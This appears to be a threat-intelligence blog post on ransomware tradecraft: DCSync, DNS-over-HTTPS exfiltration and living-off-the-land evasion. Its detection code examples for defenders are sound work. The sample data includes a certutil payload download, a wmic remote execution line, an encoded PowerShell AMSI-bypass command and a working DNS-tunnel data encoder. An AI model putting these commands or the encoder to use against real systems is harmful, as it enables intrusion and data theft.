Ransomware operators have shifted from opportunistic spray-and-pray tactics to highly targeted intrusions, with median dwell times between initial access and encryption now exceeding three weeks. This post examines the MITRE ATT&CK technique clusters observed across 14 incidents in Q1 2026.

The Shift to Pre-Ransomware Reconnaissance

Affiliates now conduct extensive Active Directory enumeration with BloodHound and its SharpHound collector before deploying encryptors, mapping attack paths so that the eventual encryption reaches the maximum blast radius. Domain admin credentials are routinely obtained via DCSync (T1003.006) weeks before encryption begins. DCSync is not a bypass: it asks a domain controller for replication data, so the attacker must first hold an account with directory replication rights on the domain object, and each such request is recorded in Security event 4662 when Directory Service Access auditing is enabled.
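One way to surface the replication request that DCSync cannot avoid, written here as an added example rather than code from this post: scan Security event 4662 records for the replication control access rights and alert on any principal that is not a known domain controller or an explicitly allowed directory-sync account. The event records, the DC names (DC01$, DC02$) and the MSOL_ account name are constructed for the example; the three GUIDs are the real DS-Replication-Get-Changes rights as they appear in the Properties field.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not code from the original post. DCSync works by asking a DC
for replication data, which requires the DS-Replication-Get-Changes control
access rights on the domain object; the GUIDs below are those rights as they
appear in the Properties field of event 4662. The event records, the DC
names and the allowed sync account are constructed for this example.
"""
import re

# Control access right GUIDs that a replication request exercises.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Assumptions standing in for your inventory: DC computer accounts replicate
# legitimately, as does an Entra Connect (MSOL_*) account if you run one.
DOMAIN_CONTROLLERS = {"DC01$", "DC02$"}
ALLOWED_SYNC_ACCOUNTS = {"MSOL_0a1b2c3d4e5f"}

# Constructed 4662 records, reduced to the fields the check needs.
SAMPLE_EVENTS = [
    # routine DC-to-DC replication
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # a user account requesting replication: this is the DCSync signature
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "j.doe",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # an unrelated 4662 (user-class object access, no replication rights)
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "svc-backup",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # allowed directory sync account
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "MSOL_0a1b2c3d4e5f",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # a different event type entirely
    {"EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "j.doe", "Properties": ""},
]


def replication_rights_in(properties: str) -> list:
    """Return the names of replication rights referenced in a Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, domain_controllers=DOMAIN_CONTROLLERS,
                  allowed=ALLOWED_SYNC_ACCOUNTS) -> list:
    """Alert on replication requests from any principal that is not a known DC
    or an explicitly allowed sync account."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        user = ev["SubjectUserName"]
        if user in domain_controllers or user in allowed:
            continue
        alerts.append({"user": f"{ev['SubjectDomainName']}\\{user}", "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspected: {alert['user']} exercised {', '.join(alert['rights'])}")
```

Event 4662 only exists for these rights if "Audit Directory Service Access" is enabled and the domain naming context carries a SACL covering them, so check that before relying on the rule. The allowlist is by account name: a compromised DC computer account would pass it, and an account that was quietly granted replication rights would be caught here but should also be found earlier by reviewing who holds those rights on the domain object.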

Novel Exfiltration via DNS Tunnelling

A notable shift observed in 2026 is the use of DNS-over-HTTPS tunnelling for data exfiltration, routing queries through legitimate public resolvers to evade network-based DLP controls (T1048.002, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; the plaintext-DNS variant of the same tunnelling maps to T1048.003). Victim data is base64-encoded, chunked and embedded in the query names of TXT lookups against attacker-controlled zones. DNS labels are limited to 63 bytes and a whole name to 253, so each query carries only a few hundred bytes and a tunnel of any size produces thousands of unique subdomains under one zone. Because the queries travel inside TLS to a reputable resolver, network sensors see only HTTPS to a well-known endpoint, so neither deep packet inspection nor the enterprise resolver's logs help. Endpoint telemetry is the remaining vantage point: if the tunnel uses the Windows DNS client with DoH enabled, Sysmon event 22 still records the query names; if the tool speaks DoH itself, what remains is a process holding sustained HTTPS connections to a public resolver, so blocking or proxying access to known DoH resolvers forces the traffic back onto a path you can log.

Living-Off-the-Land Techniques

Operators increasingly rely on native Windows tools, including certutil.exe (as a downloader and base64 decoder), wmic.exe (for local and remote process creation) and PowerShell with AMSI bypasses, to reduce the malware footprint that an EDR could signature. Further EDR evasion is achieved through direct syscalls, which sidestep the user-mode hooks EDR agents place on ntdll.dll, and through process hollowing (T1055.012) into signed Microsoft binaries so that the injected code runs under a trusted image name.
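The tools named above leave their fingerprints in process-creation telemetry (Sysmon event 1 or Security event 4688). As an added example, not code from this post, the following heuristics score command lines for certutil used as a downloader or decoder, wmic used for remote process creation, and PowerShell launched with the switch combinations droppers favour, decoding any -EncodedCommand payload and checking it for AMSI-tampering strings. The command lines, the host name FS01 and the IP address are constructed; the patterns are hunting heuristics, not a complete EDR policy.

```python
"""Heuristics for living-off-the-land abuse in process-creation telemetry.

Added example, not code from the original post. It scores command lines as
they would appear in Sysmon event 1 or Security event 4688: certutil used as
a downloader or decoder, wmic for (remote) process creation, and PowerShell
launched with the switch combinations that droppers use, with any -enc
payload decoded and checked for AMSI-tampering strings. The command lines
and the IP address are constructed; the patterns are hunting heuristics.
"""
import base64
import re

RULES = {
    "certutil_download":   re.compile(r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b", re.I),
    "certutil_decode":     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-decode(?:hex)?\b", re.I),
    "wmic_process_create": re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I),
    "wmic_remote_node":    re.compile(r"\bwmic(?:\.exe)?\b.*\s/node:", re.I),
}

# PowerShell switches that are individually ordinary but rarely combined by
# admins; two or more together is the trigger.
PS_SWITCHES = {
    "noprofile":      re.compile(r"\s-nop(?:rofile)?\b", re.I),
    "noninteractive": re.compile(r"\s-noni(?:nteractive)?\b", re.I),
    "hidden_window":  re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I),
    "encoded":        re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy":  re.compile(r"\s-e(?:p|x(?:ecutionpolicy)?)\s+bypass\b", re.I),
}
POWERSHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
ENCODED_RE = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
AMSI_RE = re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsi\.dll", re.I)


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> list:
    """Return the names of all heuristics a command line trips."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    if POWERSHELL_RE.search(cmdline):
        switches = [name for name, rx in PS_SWITCHES.items() if rx.search(cmdline)]
        if len(switches) >= 2:
            hits.append("ps_suspicious_switches:" + "+".join(switches))
    decoded = decode_encoded_command(cmdline) or ""
    if AMSI_RE.search(cmdline) or AMSI_RE.search(decoded):
        hits.append("amsi_tamper")
    return hits


# Constructed sample: the encoded payload references the AMSI helper class
# that public bypass one-liners patch, so the decoder has something to find.
ENCODED_AMSI = base64.b64encode(
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')".encode("utf-16-le")
).decode()

SAMPLE_PROCESSES = [
    r"certutil.exe -verify C:\certs\server.cer",                    # benign
    r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",       # benign
    r"certutil.exe -urlcache -split -f http://198.51.100.23/x.txt C:\Users\Public\x.txt",
    r"certutil.exe -decode C:\Users\Public\x.txt C:\Users\Public\x.exe",
    r'wmic.exe /node:FS01 process call create "cmd.exe /c C:\Users\Public\x.exe"',
    f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_AMSI}",
]


def scan(processes) -> dict:
    """Map each flagged command line to its hits; clean lines are omitted."""
    return {cmd: hits for cmd in processes if (hits := classify(cmd))}


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_PROCESSES).items():
        print(f"{', '.join(hits)}\n    {cmd[:100]}")
```

The decode step matters more than the switch matching: the AMSI-tampering strings, and the URLs and paths of the next stage, are usually only visible after the -enc payload is turned back into script text. Expect the wmic rules to fire on legitimate admin scripts; the value is in pairing them with the parent process and the account, which this scorer deliberately leaves to the caller.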

Defensive Recommendations

Organisations should prioritise credential hygiene, enforce tiered administrative access, and deploy honeytokens across Active Directory (decoy accounts and service principals that no legitimate process should ever touch, so that any query or ticket request against them is a reconnaissance signal) to detect enumeration early. Monitoring DNS query patterns remains one of the highest-yield detections for this campaign cluster: count unique subdomains per zone and look at label length and character entropy rather than raw query volume alone, and make sure the queries are captured at the endpoint or the enterprise resolver, since a client tunnelling over DoH to a public resolver leaves nothing in the resolver's log.
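The exfiltration channel described in the DNS tunnelling section and the detection recommended here, carried through as one added example that is not code from this post. The encoder shows the constraint the tunnel is bound by (63-byte labels, 253-byte names, so one unique subdomain per few hundred bytes of data), and the detector scores the resulting per-zone features in a DNS client log: unique subdomains, longest label and mean character entropy. The zone names example-updates.net and cdn-edge.net, the host name WS-0042 and the payload are constructed, and there is no public-suffix list, so the last two labels are taken as the zone.

```python
"""Encode data into DNS query names and detect the result in DNS telemetry.

Added example, not code from the original post. The encoder shows why a
tunnel needs one unique subdomain per few hundred bytes (63-byte labels,
253-byte names). The detector scores the features a tunnel leaves in
whatever DNS log you have (enterprise resolver, or the endpoint if the
client uses DoH to a public resolver): unique subdomains per zone, label
length and character entropy. Zone names, host name and payload are
constructed; without a public-suffix list the last two labels are the zone.
"""
import base64
import hashlib
import math
from collections import defaultdict

MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # practical presentation-format name limit
TUNNEL_DOMAIN = "example-updates.net"


def encode_for_dns(data: bytes, domain: str, labels_per_query: int = 3) -> list:
    """Chunk data into query names under `domain`. Base32 is used because DNS
    names are case-insensitive and '+', '/' and '=' are not label-safe; a
    sequence label lets the receiver reassemble out-of-order queries."""
    payload = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = labels_per_query * MAX_LABEL
    names = []
    for seq, start in enumerate(range(0, len(payload), per_query)):
        chunk = payload[start:start + per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"s{seq:04d}", *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError("name exceeds 253 bytes; reduce labels_per_query")
        names.append(name)
    return names


def decode_from_dns(names, domain: str) -> bytes:
    """Receiver side: reassemble by sequence number and restore base32 padding."""
    chunks = {}
    for name in names:
        parts = name[: -(len(domain) + 1)].split(".")
        chunks[int(parts[0][1:])] = "".join(parts[1:])
    payload = "".join(chunks[k] for k in sorted(chunks))
    payload += "=" * (-len(payload) % 8)
    return base64.b32decode(payload, casefold=True)


def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def registered_domain(qname: str) -> str:
    return ".".join(qname.rstrip(".").split(".")[-2:])


def score_dns_log(queries, min_unique=20, min_label=30, min_entropy=3.5) -> dict:
    """queries: iterable of (host, query_name). Returns flagged zones with the
    evidence behind each verdict."""
    by_zone = defaultdict(list)
    for host, qname in queries:
        by_zone[registered_domain(qname)].append((host, qname))
    findings = {}
    for zone, items in by_zone.items():
        subs = {q[: -(len(zone) + 1)] for _, q in items if len(q) > len(zone) + 1}
        if len(subs) < min_unique:
            continue
        longest_label = max(len(label) for s in subs for label in s.split("."))
        mean_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if longest_label >= min_label and mean_entropy >= min_entropy:
            findings[zone] = {
                "unique_subdomains": len(subs),
                "longest_label": longest_label,
                "mean_entropy": round(mean_entropy, 2),
                "hosts": sorted({h for h, _ in items}),
            }
    return findings


# Constructed payload: 4 KiB of deterministic pseudo-random bytes behind a short header.
SAMPLE_SECRET = b"customer-export.csv:" + b"".join(
    hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(128))


def build_sample_log() -> list:
    """Constructed DNS client log for one workstation: ordinary lookups, a CDN
    that also produces many unique but short subdomains, and the tunnel."""
    host = "WS-0042"
    log = [(host, f"{sub}.example.com") for sub in (
        "www", "mail", "api", "cdn", "login", "sso", "vpn", "git", "wiki", "ci",
        "static", "img", "docs", "status", "jira", "hr", "pay", "ns1", "ns2", "ldap")]
    log += [(host, f"d{i:02d}abcdefgh.cdn-edge.net") for i in range(40)]
    log += [(host, name) for name in encode_for_dns(SAMPLE_SECRET, TUNNEL_DOMAIN)]
    return log


if __name__ == "__main__":
    for zone, evidence in score_dns_log(build_sample_log()).items():
        print(zone, evidence)
```

The CDN zone in the sample is there on purpose: unique-subdomain count alone flags every content network and telemetry service, which is why the label-length and entropy features are required together. Some security products also emit long, high-entropy lookups (signature and reputation checks), so a deployed version needs a zone allowlist and a per-host baseline, and the thresholds here are starting points rather than tuned values.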